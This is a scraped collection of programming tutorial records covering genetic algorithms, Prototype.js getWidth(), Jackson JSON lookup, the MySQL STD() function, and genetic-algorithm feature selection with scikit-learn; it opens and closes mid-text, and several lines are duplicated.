transmitted. However, from a computation view point, it has been shown that adopting the Lamarckian model gives good results for some of the problems." }, { "code": null, "e": 33768, "s": 33606, "text": "In the Lamarckian model, a local search operator examines the neighborhood (acquiring new traits), and if a better chromosome is found, it becomes the offspring." }, { "code": null, "e": 34139, "s": 33768, "text": "The Baldwinian model is an intermediate idea named after James Mark Baldwin (1896). In the Baldwin model, the chromosomes can encode a tendency of learning beneficial behaviors. This means, that unlike the Lamarckian model, we don’t transmit the acquired traits to the next generation, and neither do we completely ignore the acquired traits like in the Darwinian Model." }, { "code": null, "e": 34307, "s": 34139, "text": "The Baldwin Model is in the middle of these two extremes, wherein the tendency of an individual to acquire certain traits is encoded rather than the traits themselves." }, { "code": null, "e": 34690, "s": 34307, "text": "In this Baldwinian Model, a local search operator examines the neighborhood (acquiring new traits), and if a better chromosome is found, it only assigns the improved fitness to the chromosome and does not modify the chromosome itself. The change in fitness signifies the chromosomes capability to “acquire the trait”, even though it is not passed directly to the future generations." }, { "code": null, "e": 34918, "s": 34690, "text": "GAs are very general in nature, and just applying them to any optimization problem wouldn’t give good results. In this section, we describe a few points which would help and assist a GA designer or GA implementer in their work." }, { "code": null, "e": 35194, "s": 34918, "text": "It has been observed that the more problem-specific domain knowledge we incorporate into the GA; the better objective values we get. Adding problem specific information can be done by either using problem specific crossover or mutation operators, custom representations, etc." }, { "code": null, "e": 35258, "s": 35194, "text": "The following image shows Michalewicz’s (1990) view of the EA −" }, { "code": null, "e": 35582, "s": 35258, "text": "Crowding happens when a highly fit chromosome gets to reproduce a lot, and in a few generations, the entire population is filled with similar solutions having similar fitness. This reduces diversity which is a very crucial element to ensure the success of a GA. There are numerous ways to limit crowding. Some of them are −" }, { "code": null, "e": 35615, "s": 35582, "text": "Mutation to introduce diversity." }, { "code": null, "e": 35648, "s": 35615, "text": "Mutation to introduce diversity." }, { "code": null, "e": 35811, "s": 35648, "text": "Switching to rank selection and tournament selection which have more selection pressure than fitness proportionate selection for individuals with similar fitness." }, { "code": null, "e": 35974, "s": 35811, "text": "Switching to rank selection and tournament selection which have more selection pressure than fitness proportionate selection for individuals with similar fitness." }, { "code": null, "e": 36091, "s": 35974, "text": "Fitness Sharing − In this an individual’s fitness is reduced if the population already contains similar individuals." }, { "code": null, "e": 36208, "s": 36091, "text": "Fitness Sharing − In this an individual’s fitness is reduced if the population already contains similar individuals." }, { "code": null, "e": 36483, "s": 36208, "text": "It has been experimentally observed that the best solutions are driven by randomized chromosomes as they impart diversity to the population. The GA implementer should be careful to keep sufficient amount of randomization and diversity in the population for the best results." }, { "code": null, "e": 36606, "s": 36483, "text": "Local search refers to checking the solutions in the neighborhood of a given solution to look for better objective values." }, { "code": null, "e": 36766, "s": 36606, "text": "It may be sometimes useful to hybridize the GA with local search. The following image shows the various places in which local search can be introduced in a GA." }, { "code": null, "e": 37089, "s": 36766, "text": "In genetic algorithms, there is no “one size fits all” or a magic formula which works for all problems. Even after the initial GA is ready, it takes a lot of time and effort to play around with the parameters like population size, mutation and crossover probability etc. to find the ones which suit the particular problem." }, { "code": null, "e": 37245, "s": 37089, "text": "In this section, we introduce some advanced topics in Genetic Algorithms. A reader looking for just an introduction to GAs may choose to skip this section." }, { "code": null, "e": 37570, "s": 37245, "text": "Constrained Optimization Problems are those optimization problems in which we have to maximize or minimize a given objective function value that is subject to certain constraints. Therefore, not all results in the solution space are feasible, and the solution space contains feasible regions as shown in the following image." }, { "code": null, "e": 37785, "s": 37570, "text": "In such a scenario, crossover and mutation operators might give us solutions which are infeasible. Therefore, additional mechanisms have to be employed in the GA when dealing with constrained Optimization Problems." }, { "code": null, "e": 37823, "s": 37785, "text": "Some of the most common methods are −" }, { "code": null, "e": 38036, "s": 37823, "text": "Using penalty functions which reduces the fitness of infeasible solutions, preferably so that the fitness is reduced in proportion with the number of constraints violated or the distance from the feasible region." }, { "code": null, "e": 38249, "s": 38036, "text": "Using penalty functions which reduces the fitness of infeasible solutions, preferably so that the fitness is reduced in proportion with the number of constraints violated or the distance from the feasible region." }, { "code": null, "e": 38368, "s": 38249, "text": "Using repair functions which take an infeasible solution and modify it so that the violated constraints get satisfied." }, { "code": null, "e": 38487, "s": 38368, "text": "Using repair functions which take an infeasible solution and modify it so that the violated constraints get satisfied." }, { "code": null, "e": 38558, "s": 38487, "text": "Not allowing infeasible solutions to enter into the population at all." }, { "code": null, "e": 38629, "s": 38558, "text": "Not allowing infeasible solutions to enter into the population at all." }, { "code": null, "e": 38722, "s": 38629, "text": "Use a special representation or decoder functions that ensures feasibility of the solutions." }, { "code": null, "e": 38815, "s": 38722, "text": "Use a special representation or decoder functions that ensures feasibility of the solutions." }, { "code": null, "e": 38923, "s": 38815, "text": "In this section, we will discuss about the Schema and NFL theorem along with the building block hypothesis." }, { "code": null, "e": 39197, "s": 38923, "text": "Researchers have been trying to figure out the mathematics behind the working of genetic algorithms, and Holland’s Schema Theorem is a step in that direction. Over the year’s various improvements and suggestions have been done to the Schema Theorem to make it more general." }, { "code": null, "e": 39398, "s": 39197, "text": "In this section, we don’t delve into the mathematics of the Schema Theorem, rather we try to develop a basic understanding of what the Schema Theorem is. The basic terminology to know are as follows −" }, { "code": null, "e": 39653, "s": 39398, "text": "A Schema is a “template”. Formally, it is a string over the alphabet = {0,1,*},\nwhere * is don’t care and can take any value.\nTherefore, *10*1 could mean 01001, 01011, 11001, or 11011\nGeometrically, a schema is a hyper-plane in the solution search space." }, { "code": null, "e": 39733, "s": 39653, "text": "A Schema is a “template”. Formally, it is a string over the alphabet = {0,1,*}," }, { "code": null, "e": 39779, "s": 39733, "text": "where * is don’t care and can take any value." }, { "code": null, "e": 39837, "s": 39779, "text": "Therefore, *10*1 could mean 01001, 01011, 11001, or 11011" }, { "code": null, "e": 39908, "s": 39837, "text": "Geometrically, a schema is a hyper-plane in the solution search space." }, { "code": null, "e": 39980, "s": 39908, "text": "Order of a schema is the number of specified fixed positions in a gene." }, { "code": null, "e": 40052, "s": 39980, "text": "Order of a schema is the number of specified fixed positions in a gene." }, { "code": null, "e": 40136, "s": 40052, "text": "Defining length is the distance between the two furthest fixed symbols in the gene." }, { "code": null, "e": 40220, "s": 40136, "text": "Defining length is the distance between the two furthest fixed symbols in the gene." }, { "code": null, "e": 40379, "s": 40220, "text": "The schema theorem states that this schema with above average fitness, short defining length and lower order is more likely to survive crossover and mutation." }, { "code": null, "e": 40687, "s": 40379, "text": "Building Blocks are low order, low defining length schemata with the above given average fitness. The building block hypothesis says that such building blocks serve as a foundation for the GAs success and adaptation in GAs as it progresses by successively identifying and recombining such “building blocks”." }, { "code": null, "e": 40946, "s": 40687, "text": "Wolpert and Macready in 1997 published a paper titled \"No Free Lunch Theorems for Optimization.\" It essentially states that if we average over the space of all possible problems, then all non-revisiting black box algorithms will exhibit the same performance." }, { "code": null, "e": 41127, "s": 40946, "text": "It means that the more we understand a problem, our GA becomes more problem specific and gives better performance, but it makes up for that by performing poorly for other problems." }, { "code": null, "e": 41382, "s": 41127, "text": "Genetic Algorithms also find application in Machine Learning. Classifier systems are a form of genetics-based machine learning (GBML) system that are frequently used in the field of machine learning. GBML methods are a niche approach to machine learning." }, { "code": null, "e": 41425, "s": 41382, "text": "There are two categories of GBML systems −" }, { "code": null, "e": 41546, "s": 41425, "text": "The Pittsburg Approach − In this approach, one chromosome encoded one solution, and so fitness is assigned to solutions." }, { "code": null, "e": 41667, "s": 41546, "text": "The Pittsburg Approach − In this approach, one chromosome encoded one solution, and so fitness is assigned to solutions." }, { "code": null, "e": 41798, "s": 41667, "text": "The Michigan Approach − one solution is typically represented by many chromosomes and so fitness is assigned to partial solutions." }, { "code": null, "e": 41929, "s": 41798, "text": "The Michigan Approach − one solution is typically represented by many chromosomes and so fitness is assigned to partial solutions." }, { "code": null, "e": 42073, "s": 41929, "text": "It should be kept in mind that the standard issue like crossover, mutation, Lamarckian or Darwinian, etc. are also present in the GBML systems." }, { "code": null, "e": 42219, "s": 42073, "text": "Genetic Algorithms are primarily used in optimization problems of various kinds, but they are frequently used in other application areas as well." }, { "code": null, "e": 42323, "s": 42219, "text": "In this section, we list some of the areas in which Genetic Algorithms are frequently used. These are −" }, { "code": null, "e": 42602, "s": 42323, "text": "Optimization − Genetic Algorithms are most commonly used in optimization problems wherein we have to maximize or minimize a given objective function value under a given set of constraints. The approach to solve Optimization problems has been highlighted throughout the tutorial." }, { "code": null, "e": 42881, "s": 42602, "text": "Optimization − Genetic Algorithms are most commonly used in optimization problems wherein we have to maximize or minimize a given objective function value under a given set of constraints. The approach to solve Optimization problems has been highlighted throughout the tutorial." }, { "code": null, "e": 43030, "s": 42881, "text": "Economics − GAs are also used to characterize various economic models like the cobweb model, game theory equilibrium resolution, asset pricing, etc." }, { "code": null, "e": 43179, "s": 43030, "text": "Economics − GAs are also used to characterize various economic models like the cobweb model, game theory equilibrium resolution, asset pricing, etc." }, { "code": null, "e": 43281, "s": 43179, "text": "Neural Networks − GAs are also used to train neural networks, particularly recurrent neural networks." }, { "code": null, "e": 43383, "s": 43281, "text": "Neural Networks − GAs are also used to train neural networks, particularly recurrent neural networks." }, { "code": null, "e": 43557, "s": 43383, "text": "Parallelization − GAs also have very good parallel capabilities, and prove to be very effective means in solving certain problems, and also provide a good area for research." }, { "code": null, "e": 43731, "s": 43557, "text": "Parallelization − GAs also have very good parallel capabilities, and prove to be very effective means in solving certain problems, and also provide a good area for research." }, { "code": null, "e": 43847, "s": 43731, "text": "Image Processing − GAs are used for various digital image processing (DIP) tasks as well like dense pixel matching." }, { "code": null, "e": 43963, "s": 43847, "text": "Image Processing − GAs are used for various digital image processing (DIP) tasks as well like dense pixel matching." }, { "code": null, "e": 44066, "s": 43963, "text": "Vehicle routing problems − With multiple soft time windows, multiple depots and a heterogeneous fleet." }, { "code": null, "e": 44169, "s": 44066, "text": "Vehicle routing problems − With multiple soft time windows, multiple depots and a heterogeneous fleet." }, { "code": null, "e": 44293, "s": 44169, "text": "Scheduling applications − GAs are used to solve various scheduling problems as well, particularly the time tabling problem." }, { "code": null, "e": 44417, "s": 44293, "text": "Scheduling applications − GAs are used to solve various scheduling problems as well, particularly the time tabling problem." }, { "code": null, "e": 44534, "s": 44417, "text": "Machine Learning − as already discussed, genetics based machine learning (GBML) is a niche area in machine learning." }, { "code": null, "e": 44651, "s": 44534, "text": "Machine Learning − as already discussed, genetics based machine learning (GBML) is a niche area in machine learning." }, { "code": null, "e": 44778, "s": 44651, "text": "Robot Trajectory Generation − GAs have been used to plan the path which a robot arm takes by moving from one point to another." }, { "code": null, "e": 44905, "s": 44778, "text": "Robot Trajectory Generation − GAs have been used to plan the path which a robot arm takes by moving from one point to another." }, { "code": null, "e": 45033, "s": 44905, "text": "Parametric Design of Aircraft − GAs have been used to design aircrafts by varying the parameters and evolving better solutions." }, { "code": null, "e": 45161, "s": 45033, "text": "Parametric Design of Aircraft − GAs have been used to design aircrafts by varying the parameters and evolving better solutions." }, { "code": null, "e": 45272, "s": 45161, "text": "DNA Analysis − GAs have been used to determine the structure of DNA using spectrometric data about the sample." }, { "code": null, "e": 45383, "s": 45272, "text": "DNA Analysis − GAs have been used to determine the structure of DNA using spectrometric data about the sample." }, { "code": null, "e": 45529, "s": 45383, "text": "Multimodal Optimization − GAs are obviously very good approaches for multimodal optimization in which we have to find multiple optimum solutions." }, { "code": null, "e": 45675, "s": 45529, "text": "Multimodal Optimization − GAs are obviously very good approaches for multimodal optimization in which we have to find multiple optimum solutions." }, { "code": null, "e": 45852, "s": 45675, "text": "Traveling salesman problem and its applications − GAs have been used to solve the TSP, which is a well-known combinatorial problem using novel crossover and packing strategies." }, { "code": null, "e": 46029, "s": 45852, "text": "Traveling salesman problem and its applications − GAs have been used to solve the TSP, which is a well-known combinatorial problem using novel crossover and packing strategies." }, { "code": null, "e": 46172, "s": 46029, "text": "The following books can be referred to further enhance the reader’s knowledge of Genetic Algorithms, and Evolutionary Computation in general −" }, { "code": null, "e": 46258, "s": 46172, "text": "Genetic Algorithms in Search, Optimization and Machine Learning by David E. Goldberg." }, { "code": null, "e": 46344, "s": 46258, "text": "Genetic Algorithms in Search, Optimization and Machine Learning by David E. Goldberg." }, { "code": null, "e": 46430, "s": 46344, "text": "Genetic Algorithms + Data Structures = Evolutionary Programs by Zbigniew Michalewicz." }, { "code": null, "e": 46516, "s": 46430, "text": "Genetic Algorithms + Data Structures = Evolutionary Programs by Zbigniew Michalewicz." }, { "code": null, "e": 46584, "s": 46516, "text": "Practical Genetic Algorithms by Randy L. Haupt and Sue Ellen Haupt." }, { "code": null, "e": 46652, "s": 46584, "text": "Practical Genetic Algorithms by Randy L. Haupt and Sue Ellen Haupt." }, { "code": null, "e": 46729, "s": 46652, "text": "Multi Objective Optimization using Evolutionary Algorithms by Kalyanmoy Deb." }, { "code": null, "e": 46806, "s": 46729, "text": "Multi Objective Optimization using Evolutionary Algorithms by Kalyanmoy Deb." }, { "code": null, "e": 46813, "s": 46806, "text": " Print" }, { "code": null, "e": 46824, "s": 46813, "text": " Add Notes" } ]
Prototype - getWidth() Method
This method finds and returns the computed width of element. This method returns correct values on elements whose display is set to none either in an inline style rule or in an CSS stylesheet. Note that the value returned is a number only although it is expressed in pixels. element.getWidth(); It returns the computed width of an element. <html> <head> <title>Prototype examples</title> <script type = "text/javascript" src = "/javascript/prototype.js"></script> <script> function showResult() { var width = $('rectangle').getWidth(); alert("Element width is " + width ); } </script> </head> <body> <p>Click the button to see the result.</p> <div id = "rectangle" style = "font-size: 10px; width: 20em; height 10em"> <p>This is the paragraph.</p> </div> <br /> <input type = "button" value = "showResult" onclick = "showResult();"/> </body> </html> Click the button to see the result. This is the paragraph. 127 Lectures 11.5 hours Aleksandar Cucukovic Print Add Notes Bookmark this page
[ { "code": null, "e": 2122, "s": 2061, "text": "This method finds and returns the computed width of element." }, { "code": null, "e": 2254, "s": 2122, "text": "This method returns correct values on elements whose display is set to none either in an inline style rule or in an CSS stylesheet." }, { "code": null, "e": 2336, "s": 2254, "text": "Note that the value returned is a number only although it is expressed in pixels." }, { "code": null, "e": 2357, "s": 2336, "text": "element.getWidth();\n" }, { "code": null, "e": 2402, "s": 2357, "text": "It returns the computed width of an element." }, { "code": null, "e": 3062, "s": 2402, "text": "<html>\n <head>\n <title>Prototype examples</title>\n <script type = \"text/javascript\" src = \"/javascript/prototype.js\"></script>\n \n <script>\n function showResult() {\n var width = $('rectangle').getWidth();\n alert(\"Element width is \" + width );\n }\n </script>\n </head>\n\n <body>\n <p>Click the button to see the result.</p>\n \n <div id = \"rectangle\" \n style = \"font-size: 10px; width: 20em; height 10em\">\n <p>This is the paragraph.</p>\n </div>\n <br />\n \n <input type = \"button\" value = \"showResult\" onclick = \"showResult();\"/>\n </body>\n</html>" }, { "code": null, "e": 3098, "s": 3062, "text": "Click the button to see the result." }, { "code": null, "e": 3121, "s": 3098, "text": "This is the paragraph." }, { "code": null, "e": 3158, "s": 3121, "text": "\n 127 Lectures \n 11.5 hours \n" }, { "code": null, "e": 3180, "s": 3158, "text": " Aleksandar Cucukovic" }, { "code": null, "e": 3187, "s": 3180, "text": " Print" }, { "code": null, "e": 3198, "s": 3187, "text": " Add Notes" } ]
How to search a value inside a JSON file using Jackson in Java?
The com.fasterxml.jackson.databind.node.ObjectNode class can be used to map the JSON object structure in Json content. We can search for a particular value inside the JSON file using the get() method of ObjectNode class, this method used for accessing the value of a specified field of an object node. public JsonNode get(String fieldName) import com.fasterxml.jackson.databind.ObjectMapper; import com.fasterxml.jackson.databind.node.ObjectNode; public class ObjectNodeTest { public static void main(String args[]) throws Exception { String jsonString = "{\"Id\":101, \"name\":\"Raja Ramesh\", \"address\":\"Madhapur\"}"; ObjectMapper mapper = new ObjectMapper(); ObjectNode node = mapper.readValue(jsonString, ObjectNode.class); if(node.has("name")) { System.out.println("NAME: " + node.get("name")); } } } NAME: "Raja Ramesh"
[ { "code": null, "e": 1364, "s": 1062, "text": "The com.fasterxml.jackson.databind.node.ObjectNode class can be used to map the JSON object structure in Json content. We can search for a particular value inside the JSON file using the get() method of ObjectNode class, this method used for accessing the value of a specified field of an object node." }, { "code": null, "e": 1402, "s": 1364, "text": "public JsonNode get(String fieldName)" }, { "code": null, "e": 1916, "s": 1402, "text": "import com.fasterxml.jackson.databind.ObjectMapper;\nimport com.fasterxml.jackson.databind.node.ObjectNode;\npublic class ObjectNodeTest {\n public static void main(String args[]) throws Exception {\n String jsonString = \"{\\\"Id\\\":101, \\\"name\\\":\\\"Raja Ramesh\\\", \\\"address\\\":\\\"Madhapur\\\"}\";\n ObjectMapper mapper = new ObjectMapper();\n ObjectNode node = mapper.readValue(jsonString, ObjectNode.class);\n if(node.has(\"name\")) {\n System.out.println(\"NAME: \" + node.get(\"name\"));\n }\n }\n}" }, { "code": null, "e": 1936, "s": 1916, "text": "NAME: \"Raja Ramesh\"" } ]
STD() function in MySQL - GeeksforGeeks
11 Jan, 2021 With the help of STD() function we can calculate population Standard deviation of an expression in MySQL. But, if there are no matching rows in the given expression it returns Null. Syntax : STD(expr); Parameter : This method accepts only one parameter. expr : Input expression from which we want to calculate population standard deviation. Returns : It returns the population standard deviation. Example-1 :Finding population standard deviation of RunScored column from the given Player table using STD Function. Creating a Player table : CREATE TABLE Player ( PlayerId INT AUTO_INCREMENT, PlayerName VARCHAR(100) NOT NULL, RunScored INT NOT NULL, WicketsTaken INT NOT NULL, PRIMARY KEY(PlayerId) ); Inserting data into the Table :To verify used the following command as follows. SELECT * from Player ; Output : Now we are going to find population standard deviation for RunScored column. SELECT STD(RunScored ) as Pop_Standard_Deviation FROM Player ; Output : Example-2 :Now we are going to find population standard deviation of WicketsTaken column. SELECT STD(WicketsTaken) as Pop_Std_Dev_Wickets FROM Player ; Output : Example-3 :In this example we are going to find the population standard deviation of Income of Employee who are working in the location ‘Kolkata’ To demonstrate create a table named EmloyeeDetails. CREATE TABLE EmployeeDetails( Employee_Id INT AUTO_INCREMENT, Employee_Name VARCHAR(100) NOT NULL, Working_At VARCHAR(20) NOT NULL, Work_Location VARCHAR(20) NOT NULL, Joining_Date DATE NOT NULL, Annual_Income INT NOT NULL, PRIMARY KEY(Employee_Id ) ); Inserting data into the Table : INSERT INTO EmployeeDetails(Employee_Name, Working_At, Work_Location, Joining_Date, Annual_Income ) VALUES ('Amit Khan', 'XYZ Digital', 'Kolkata', '2019-10-06', 350000 ), ('Shreetama Pal', 'ABC Corp.', 'Kolkata', '2018-12-16', 500000 ), ('Aniket Sharma', 'PQR Soln.', 'Delhi', '2020-01-11', 300000 ), ('Maitree Jana', 'XYZ Digital', 'Kolkata', '2019-05-01', 400000 ), ('Priyanka Ojha', 'ABC Corp.', 'Delhi', '2019-02-13', 350000 ), ('Sayani Mitra', 'XYZ Digital', 'Kolkata', '2019-09-15', 320000 ), ('Nitin Dey', 'PQR Soln.', 'Delhi', '2019-10-06', 250000 ), ('Sujata Samanta', 'PQR Soln.', 'Kolkata', '2020-10-06', 350000 ), ('Sudip Majhi', 'ABC Corp.', 'Delhi', '2018-10-30', 600000 ), ('Sanjoy Kohli', 'XYZ Digital', 'Delhi', '2019-04-18', 450000 ) ; To verify used the following command as follows. Select * FROM EmployeeDetails; Output : Now we are going to find population standard deviation of annual Income for those Employee whose work location is ‘Kolkata’ SELECT 'Kolkata' AS 'Work_Location', STD(Annual_Income) as PopStdDevOfAnnualIncome FROM EmployeeDetails where Work_Location = 'Kolkata'; Output : DBMS-SQL mysql SQL SQL Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments How to Update Multiple Columns in Single Update Statement in SQL? What is Temporary Table in SQL? SQL Query to Find the Name of a Person Whose Name Starts with Specific Letter SQL using Python SQL | Subquery How to Write a SQL Query For a Specific Date Range and Date Time? SQL Query to Convert VARCHAR to INT SQL Query to Delete Duplicate Rows SQL Query to Compare Two Dates Window functions in SQL
[ { "code": null, "e": 23877, "s": 23849, "text": "\n11 Jan, 2021" }, { "code": null, "e": 24059, "s": 23877, "text": "With the help of STD() function we can calculate population Standard deviation of an expression in MySQL. But, if there are no matching rows in the given expression it returns Null." }, { "code": null, "e": 24068, "s": 24059, "text": "Syntax :" }, { "code": null, "e": 24079, "s": 24068, "text": "STD(expr);" }, { "code": null, "e": 24131, "s": 24079, "text": "Parameter : This method accepts only one parameter." }, { "code": null, "e": 24218, "s": 24131, "text": "expr : Input expression from which we want to calculate population standard deviation." }, { "code": null, "e": 24274, "s": 24218, "text": "Returns : It returns the population standard deviation." }, { "code": null, "e": 24391, "s": 24274, "text": "Example-1 :Finding population standard deviation of RunScored column from the given Player table using STD Function." }, { "code": null, "e": 24417, "s": 24391, "text": "Creating a Player table :" }, { "code": null, "e": 24582, "s": 24417, "text": "CREATE TABLE Player \n(\nPlayerId INT AUTO_INCREMENT, \nPlayerName VARCHAR(100) NOT NULL,\nRunScored INT NOT NULL,\nWicketsTaken INT NOT NULL,\nPRIMARY KEY(PlayerId)\n);" }, { "code": null, "e": 24662, "s": 24582, "text": "Inserting data into the Table :To verify used the following command as follows." }, { "code": null, "e": 24686, "s": 24662, "text": "SELECT * from Player ;" }, { "code": null, "e": 24695, "s": 24686, "text": "Output :" }, { "code": null, "e": 24772, "s": 24695, "text": "Now we are going to find population standard deviation for RunScored column." }, { "code": null, "e": 24838, "s": 24772, "text": "SELECT STD(RunScored ) as Pop_Standard_Deviation \nFROM Player ;\n" }, { "code": null, "e": 24847, "s": 24838, "text": "Output :" }, { "code": null, "e": 24937, "s": 24847, "text": "Example-2 :Now we are going to find population standard deviation of WicketsTaken column." }, { "code": null, "e": 25004, "s": 24937, "text": "SELECT STD(WicketsTaken) as Pop_Std_Dev_Wickets \nFROM Player ;\n" }, { "code": null, "e": 25013, "s": 25004, "text": "Output :" }, { "code": null, "e": 25211, "s": 25013, "text": "Example-3 :In this example we are going to find the population standard deviation of Income of Employee who are working in the location ‘Kolkata’ To demonstrate create a table named EmloyeeDetails." }, { "code": null, "e": 25469, "s": 25211, "text": "CREATE TABLE EmployeeDetails(\n\nEmployee_Id INT AUTO_INCREMENT, \nEmployee_Name VARCHAR(100) NOT NULL,\nWorking_At VARCHAR(20) NOT NULL,\nWork_Location VARCHAR(20) NOT NULL,\nJoining_Date DATE NOT NULL,\nAnnual_Income INT NOT NULL,\nPRIMARY KEY(Employee_Id )\n);" }, { "code": null, "e": 25501, "s": 25469, "text": "Inserting data into the Table :" }, { "code": null, "e": 26258, "s": 25501, "text": "INSERT INTO \nEmployeeDetails(Employee_Name, Working_At, Work_Location, Joining_Date, Annual_Income )\n\nVALUES\n('Amit Khan', 'XYZ Digital', 'Kolkata', '2019-10-06', 350000 ),\n('Shreetama Pal', 'ABC Corp.', 'Kolkata', '2018-12-16', 500000 ),\n('Aniket Sharma', 'PQR Soln.', 'Delhi', '2020-01-11', 300000 ),\n('Maitree Jana', 'XYZ Digital', 'Kolkata', '2019-05-01', 400000 ),\n('Priyanka Ojha', 'ABC Corp.', 'Delhi', '2019-02-13', 350000 ),\n('Sayani Mitra', 'XYZ Digital', 'Kolkata', '2019-09-15', 320000 ),\n('Nitin Dey', 'PQR Soln.', 'Delhi', '2019-10-06', 250000 ),\n('Sujata Samanta', 'PQR Soln.', 'Kolkata', '2020-10-06', 350000 ),\n('Sudip Majhi', 'ABC Corp.', 'Delhi', '2018-10-30', 600000 ),\n('Sanjoy Kohli', 'XYZ Digital', 'Delhi', '2019-04-18', 450000 ) ;" }, { "code": null, "e": 26307, "s": 26258, "text": "To verify used the following command as follows." }, { "code": null, "e": 26339, "s": 26307, "text": "Select * FROM EmployeeDetails;\n" }, { "code": null, "e": 26348, "s": 26339, "text": "Output :" }, { "code": null, "e": 26472, "s": 26348, "text": "Now we are going to find population standard deviation of annual Income for those Employee whose work location is ‘Kolkata’" }, { "code": null, "e": 26613, "s": 26472, "text": "SELECT 'Kolkata' AS 'Work_Location',\nSTD(Annual_Income) as PopStdDevOfAnnualIncome \nFROM EmployeeDetails where Work_Location = 'Kolkata';\n" }, { "code": null, "e": 26622, "s": 26613, "text": "Output :" }, { "code": null, "e": 26631, "s": 26622, "text": "DBMS-SQL" }, { "code": null, "e": 26637, "s": 26631, "text": "mysql" }, { "code": null, "e": 26641, "s": 26637, "text": "SQL" }, { "code": null, "e": 26645, "s": 26641, "text": "SQL" }, { "code": null, "e": 26743, "s": 26645, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 26752, "s": 26743, "text": "Comments" }, { "code": null, "e": 26765, "s": 26752, "text": "Old Comments" }, { "code": null, "e": 26831, "s": 26765, "text": "How to Update Multiple Columns in Single Update Statement in SQL?" }, { "code": null, "e": 26863, "s": 26831, "text": "What is Temporary Table in SQL?" }, { "code": null, "e": 26941, "s": 26863, "text": "SQL Query to Find the Name of a Person Whose Name Starts with Specific Letter" }, { "code": null, "e": 26958, "s": 26941, "text": "SQL using Python" }, { "code": null, "e": 26973, "s": 26958, "text": "SQL | Subquery" }, { "code": null, "e": 27039, "s": 26973, "text": "How to Write a SQL Query For a Specific Date Range and Date Time?" }, { "code": null, "e": 27075, "s": 27039, "text": "SQL Query to Convert VARCHAR to INT" }, { "code": null, "e": 27110, "s": 27075, "text": "SQL Query to Delete Duplicate Rows" }, { "code": null, "e": 27141, "s": 27110, "text": "SQL Query to Compare Two Dates" } ]
Tryit Editor v3.7
Tryit: All list style types
[]
Feature Selection with Genetic Algorithms | by Zachary Warnes | Towards Data Science
A genetic algorithm is a technique for optimization problems based on natural selection. In this post, I show how to use genetic algorithms for feature selection. While there are many well-known feature selections methods in scikit-learn, feature selection goes well beyond what is available there. Feature selection is a crucial aspect of any machine learning pipeline. However, these days there is a surplus of available data. As a consequence, there is often a surplus of features. As is often the case with many features, many are redundant. They add noise to your model and make model interpretation problematic. The problem is determining what features are relevant to the problem. The aim is to have quality features. This post makes use of the ‘sklearn-genetic’ package: github.com This package is compatible with existing sklearn models and provides a great deal of functionality and options for genetic selection. For this post, I am using a genetic algorithm for feature selection. But, a genetic algorithm can also be used for hyper-parameter optimization. Because the steps are pretty straightforward and generalized, it applies to many different areas. Selecting features is an NP-Hard problem. The optimal configuration is a set or subset of those features, given a set of features. This method is a discrete selection. With a permutation of possibilities, it is very costly to determine the optimal feature set. Genetic algorithms use an approach to determine an optimal set based on evolution. For feature selection, the first step is to generate a population based on subsets of the possible features. From this population, the subsets are evaluated using a predictive model for the target task. Once each member of the population is considered, a tournament is performed to determine which subsets will continue into the next generation. The next generation is composed of the tournament winners, with some cross over (update the winning feature sets with features from the other winners) and mutation (introduce or remove some features at random). An initial population is produced.A score is attached to the members of the population.A subset is selected for reproduction with a tournament.Select genetic material to pass on.Apply mutations.Repeat over multiple generations. An initial population is produced. A score is attached to the members of the population. A subset is selected for reproduction with a tournament. Select genetic material to pass on. Apply mutations. Repeat over multiple generations. The algorithm runs for a set number of generations (iterations). After which, the optimal member of the population is the selected features. The experiments are based on the UCI breast cancer dataset, which contains 569 instances and 30 features. With this dataset, I test several classifiers with all of the features, the subset of features from the genetic algorithm, and five features using the chi-squared test for comparison. Below is the code used to select up to five features using a genetic algorithm. from sklearn.datasets import load_breast_cancerfrom genetic_selection import GeneticSelectionCVfrom sklearn.tree import DecisionTreeClassifierimport pandas as pdimport numpy as npdata = load_breast_cancer()df = pd.DataFrame(data.data, columns=data.feature_names)df['target'] = data.targetX = df.drop(['target'], axis=1)y = df['target'].astype(float)estimator = DecisionTreeClassifier()model = GeneticSelectionCV( estimator, cv=5, verbose=0, scoring="accuracy", max_features=5, n_population=100, crossover_proba=0.5, mutation_proba=0.2, n_generations=50, crossover_independent_proba=0.5, mutation_independent_proba=0.04, tournament_size=3, n_gen_no_change=10, caching=True, n_jobs=-1)model = model.fit(X, y)print('Features:', X.columns[model.support_]) The initial population (of size ‘n_population’) is generated at random from the sample space of feature sets. These sets are limited in scope by the parameter ‘max_features’, which sets the maximum size of each feature subset. For each member of the initial population, a score is measured with the target metric. This measurement is the performance of the estimator specified. A tournament selection is performed to determine which members will continue to the next generation. The number of members within the tournament is set with ‘tournament_size’. Tournament size is a selection of a few members from the population that compete against one another based on the scoring metric. The winner of a tournament is chosen as a parent for the next generation. The number of members for the tournament should remain small. When the value is quite large, the current best member is usually selected. This behaviour causes none of the weaker members to be selected. While providing temporary performance gains, ultimately, this leads to a reduced performance overall as the weaker options are not given a chance to improve. In natural selection, genetic information is stored in a chromosome. During reproduction, some genetic material is passed from parent to the children. Then the child contains genetic material from both of the parents. This property is represented with the parameter ‘crossover_proba’. The probability specified represents the chance of cross over from one generate to the next. There is also the parameter ‘crossover_independent_proba’, which is the probability that a feature will cross over to the child. A critical aspect of evolution is mutation. Mutation mitigates the risk of the search falling into a local optimum and getting stuck. At each generation, in addition to the crossover, a random mutation is added. The probability that a mutation will happen is set with the parameter ‘mutation_prob’. This parameter is combined with ‘mutation_independent_proba’, which is the chance of adding a feature to the feature set. Notably, setting this probability too high transforms the algorithm into a random selection process. So, you will want to keep this value relatively low. Randomly introducing features in each generation effectively acts as a regularization for the genetic process. The genetic search algorithm used here also has a ‘n_gen_no_change’ parameter which monitors if the best member of the population hasn’t changed over several generations. The search has found an optimum in this scenario. Consider increasing the mutation or cross over probabilities to vary the selection further. The results of the genetic vs the chi-squared feature selection are showed below. The baseline performance is also listed using all features. The results are from cross-validation, the performance measured is accuracy, and the number of features used is in parenthesis. While these results are by no means conclusive, they show the benefits of the genetic algorithm. The model performance is based on the subset of features from the genetic algorithm that consistently outperformed both the baseline model and the chi-square feature subset. There was a single exception with the logistic regression model, where the results were still comparable. Additionally, the optimal feature subsets produced were smaller than the maximum of five features. Models with fewer features are ultimately preferred to larger models as they are simpler and more interpretable. Genetic Algorithms are incredibly versatile and apply 